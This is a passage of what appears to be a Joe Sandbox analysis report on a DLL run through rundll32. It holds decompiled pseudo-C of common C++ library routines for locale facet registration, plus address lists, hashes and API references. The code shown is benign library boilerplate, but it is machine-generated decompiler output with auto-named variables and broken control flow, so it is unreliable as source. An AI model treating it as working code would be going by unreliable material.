																																	_t685 = _t702;
																																	goto L68;
																																}
																															}
																														} else {
																															_t684 =  *(_t726 - 0x10);
																															 *(_t726 - 0x10) = _t684;
																															 *(_t726 - 4) = 1;
																															E6E206FD3(__eflags, _t684);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
																															 *0x6e2c6dd8 = _t684;
																															goto L61;
																														}
																													} else {
																														_t684 = _t701;
																														goto L61;
																													}
																												}
																											} else {
																												_t683 =  *(_t726 - 0x10);
																												 *(_t726 - 0x10) = _t683;
																												 *(_t726 - 4) = 1;
																												E6E206FD3(__eflags, _t683);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																												 *0x6e2c6dc4 = _t683;
																												goto L54;
																											}
																										} else {
																											_t683 = _t700;
																											goto L54;
																										}
																									}
																								} else {
																									_t682 =  *(_t726 - 0x10);
																									 *(_t726 - 0x10) = _t682;
																									 *(_t726 - 4) = 1;
																									E6E206FD3(__eflags, _t682);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																									 *0x6e2c6dc8 = _t682;
																									goto L47;
																								}
																							} else {
																								_t682 = _t699;
																								goto L47;
																							}
																						}
																					} else {
																						_t681 =  *(_t726 - 0x10);
																						 *(_t726 - 0x10) = _t681;
																						 *(_t726 - 4) = 1;
																						E6E206FD3(__eflags, _t681);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																						 *0x6e2c6df4 = _t681;
																						goto L40;
																					}
																				} else {
																					_t681 = _t698;
																					goto L40;
																				}
																			}
																		} else {
																			_t680 =  *(_t726 - 0x10);
																			 *(_t726 - 0x10) = _t680;
																			 *(_t726 - 4) = 1;
																			E6E206FD3(__eflags, _t680);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																			 *0x6e2c6df8 = _t680;
																			goto L33;
																		}
																	} else {
																		_t680 = _t697;
																		goto L33;
																	}
																}
															} else {
																_t679 =  *(_t726 - 0x10);
																 *(_t726 - 0x10) = _t679;
																 *(_t726 - 4) = 1;
																E6E206FD3(__eflags, _t679);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																 *0x6e2c6dc0 = _t679;
																goto L26;
															}
														} else {
															_t679 = _t696;
															goto L26;
														}
													}
												} else {
													_t678 =  *(_t726 - 0x10);
													 *(_t726 - 0x10) = _t678;
													 *(_t726 - 4) = 1;
													E6E206FD3(__eflags, _t678);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
													 *0x6e2c6df0 = _t678;
													goto L19;
												}
											} else {
												_t678 = _t695;
												goto L19;
											}
										}
									} else {
										_t677 =  *(_t726 - 0x10);
										 *(_t726 - 0x10) = _t677;
										 *(_t726 - 4) = 1;
										E6E206FD3(__eflags, _t677);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
										 *0x6e2c6dbc = _t677;
										goto L12;
									}
								} else {
									_t677 = _t694;
									goto L12;
								}
							}
						} else {
							_t676 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t676;
							 *(_t726 - 4) = 1;
							E6E206FD3(__eflags, _t676);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
							 *0x6e2c6dec = _t676;
							goto L5;
						}
					} else {
						_t676 = _t693;
						goto L5;
					}
				}
			}






















































                          0x6e20f2cf
                          0x6e20f2cf
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f300
                          0x6e20f305
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F2D6
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F2E0
                          • int.LIBCPMT ref: 6E20F2F7
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F331
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F351
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F36F
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
                          • Instruction ID: 10625688a95a7fcfc8cc82e3f48675f4d5747b483601fc92543ebc04cc0c7c02
                          • Opcode Fuzzy Hash: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
                          • Instruction Fuzzy Hash: A911E37591055D8FCF00DBE0C894AEEB77BBF44B19F240909E420AB2D0DFB4AA80CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A1A5, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6E20A1A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				void* _v20;
				char _v32;
				void* _t49;
				intOrPtr* _t50;
				void* _t62;
				void* _t75;
				intOrPtr* _t120;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				void* _t138;

				_t99 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t136 =  *0x6e2c6ccc; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t136;
				_t49 = E6E1E161C(0x6e2c6cb8);
				_t102 = _a8;
				_t50 = E6E1E171B(_a8, _t49);
				_t132 = _t50;
				if(_t50 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t132);
				} else {
					if(_t136 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20AA38(__ebx, _t102, __edx, _t132, _t136) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t132, _t136, 0x14);
							E6E206653( &_v20, 0);
							_t137 =  *0x6e2c6cd0; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t137;
							_t62 = E6E1E161C(0x6e2c6cbc);
							_t109 = _a8;
							_t133 = E6E1E171B(_a8, _t62);
							__eflags = _t133;
							if(_t133 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t133);
							} else {
								__eflags = _t137;
								if(_t137 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AAA0(__ebx, _t109, __edx, _t133, _t137) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t99, _t133, _t137, 0x14);
										E6E206653( &_v20, 0);
										_t138 =  *0x6e2c6cd4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t138;
										_t75 = E6E1E161C(0x6e2c6cc0);
										_t116 = _a8;
										_t134 = E6E1E171B(_a8, _t75);
										__eflags = _t134;
										if(_t134 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t134);
										} else {
											__eflags = _t138;
											if(_t138 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AB08(_t99, _t116, __edx, _t134, _t138) - 0xffffffff;
												if(__eflags == 0) {
													_t120 =  &_v32;
													E6E1E1438(_t120);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													_push(_t120);
													 *((intOrPtr*)(_t120 + 4)) = _v4;
													_v20 = _t120;
													 *_t120 = 0x6e26ba24;
													return _t120;
												} else {
													_t134 = _v16;
													_v16 = _t134;
													_v4 = 1;
													E6E206FD3(__eflags, _t134);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 4))))();
													 *0x6e2c6cd4 = _t134;
													goto L19;
												}
											} else {
												_t134 = _t138;
												goto L19;
											}
										}
									} else {
										_t133 = _v16;
										_v16 = _t133;
										_v4 = 1;
										E6E206FD3(__eflags, _t133);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
										 *0x6e2c6cd0 = _t133;
										goto L12;
									}
								} else {
									_t133 = _t137;
									goto L12;
								}
							}
						} else {
							_t132 = _v16;
							_v16 = _t132;
							_v4 = 1;
							E6E206FD3(__eflags, _t132);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 4))))();
							 *0x6e2c6ccc = _t132;
							goto L5;
						}
					} else {
						_t132 = _t136;
						goto L5;
					}
				}
			}

















                          0x6e20a1a5
                          0x6e20a1ac
                          0x6e20a1b6
                          0x6e20a1bb
                          0x6e20a1c6
                          0x6e20a1ca
                          0x6e20a1cd
                          0x6e20a1d2
                          0x6e20a1d6
                          0x6e20a1db
                          0x6e20a1df
                          0x6e20a224
                          0x6e20a227
                          0x6e20a233
                          0x6e20a1e1
                          0x6e20a1e3
                          0x6e20a1e9
                          0x6e20a1ef
                          0x6e20a1f7
                          0x6e20a1fa
                          0x6e20a237
                          0x6e20a245
                          0x6e20a24a
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a281
                          0x6e20a283
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289
                          0x6e20a1fc
                          0x6e20a1fc
                          0x6e20a1ff
                          0x6e20a203
                          0x6e20a207
                          0x6e20a214
                          0x6e20a21c
                          0x6e20a21e
                          0x00000000
                          0x6e20a21e
                          0x6e20a1e5
                          0x6e20a1e5
                          0x00000000
                          0x6e20a1e5
                          0x6e20a1e3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A1AC
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A1B6
                          • int.LIBCPMT ref: 6E20A1CD
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20A207
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A227
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A245
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
                          • Instruction ID: 6e44de99da2cb1ebe52b4e5df4bd36382c4cfab6883d3680bdc0eca246e7b81f
                          • Opcode Fuzzy Hash: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
                          • Instruction Fuzzy Hash: 8311E3B690051E9FCF00EBE4C898AEDB77BAF44714F540919E4106B2D0DFB89A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2046AB, Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E2046AB(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr* _t33;
				void* _t45;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t87;
				void* _t88;

				_t62 = __ebx;
				E6E2200AC(0x6e268144, __ebx, __edi, __esi, 0x14);
				E6E206653(_t88 - 0x14, 0);
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				_t83 =  *0x6e2dce84; // 0x2bf60f0
				 *((intOrPtr*)(_t88 - 0x10)) = _t83;
				_t32 = E6E1E161C(0x6e2dcea8);
				_t65 =  *((intOrPtr*)(_t88 + 8));
				_t33 = E6E1E171B( *((intOrPtr*)(_t88 + 8)), _t32);
				_t86 = _t33;
				if(_t33 != 0) {
					L5:
					E6E2066BA(_t88 - 0x14);
					return E6E220075(_t86);
				} else {
					if(_t83 == 0) {
						_push( *((intOrPtr*)(_t88 + 8)));
						_push(_t88 - 0x10);
						__eflags = E6E204FCE(__ebx, _t65, __edx, _t83, _t86) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t88 - 0x20);
							E6E223D74(_t88 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26816f, __ebx, _t83, _t86, 0x18);
							E6E206653(_t88 - 0x14, 0);
							 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
							_t84 =  *0x6e2dce7c; // 0x2bf9478
							 *((intOrPtr*)(_t88 - 0x10)) = _t84;
							_t45 = E6E1E161C(0x6e2dce90);
							_t72 =  *((intOrPtr*)(_t88 + 8));
							_t87 = E6E1E171B( *((intOrPtr*)(_t88 + 8)), _t45);
							__eflags = _t87;
							if(_t87 != 0) {
								L12:
								E6E2066BA(_t88 - 0x14);
